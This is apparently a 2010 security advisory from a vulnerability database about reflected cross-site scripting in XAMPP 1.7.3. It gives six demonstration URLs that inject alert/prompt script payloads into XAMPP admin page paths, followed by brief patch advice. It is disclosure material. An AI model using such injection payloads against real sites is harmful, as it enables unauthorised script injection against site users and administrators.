Xampp 1.7.3 multiple vulnerabilities

2010.11.07
Credit: Sangteamtham
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#********************************************************** # Exploit Title: Xampp 1.7.3 multiple vulnerabilities # Date: 11/06/2010 # Author: Sangteamtham # Software Link: http://www.apachefriends.org/en/xampp.html # Version: 1.7.3 # Tested on: Windows 7 # Email: Sangteamtham@gmail.com # Blog: http://sangte.blogspot.com/ # Homepage: http://hcegroup.net/hceteam #*********************************************************** 1.Description: XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. 2. Vulnerabilities: http://localhost/xampp/ming.php/"<script>alert("XSS")</script> http://localhost/xampp/iart.php/"onmouseover=prompt("XSS")> http://localhost/xampp/cds.php/'onmouseover=alert("XSS")> http://localhost/xampp/aspinfo.asp/1<script>alert("XSS")</script> http://localhost/xampp/adodb.php/"onmouseover=prompt("XSS")> http://localhost/xampp/perlinfo.pl/1<script>prompt("XSS")</script> 3. Poc: ? 4. Patch: Vender should filter the special characters when input the form. Clients should set password access to xampp folder. 5. Credits: Thanks flying to Vietnamese hackers and all hackers out there researching for more security. *************************************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top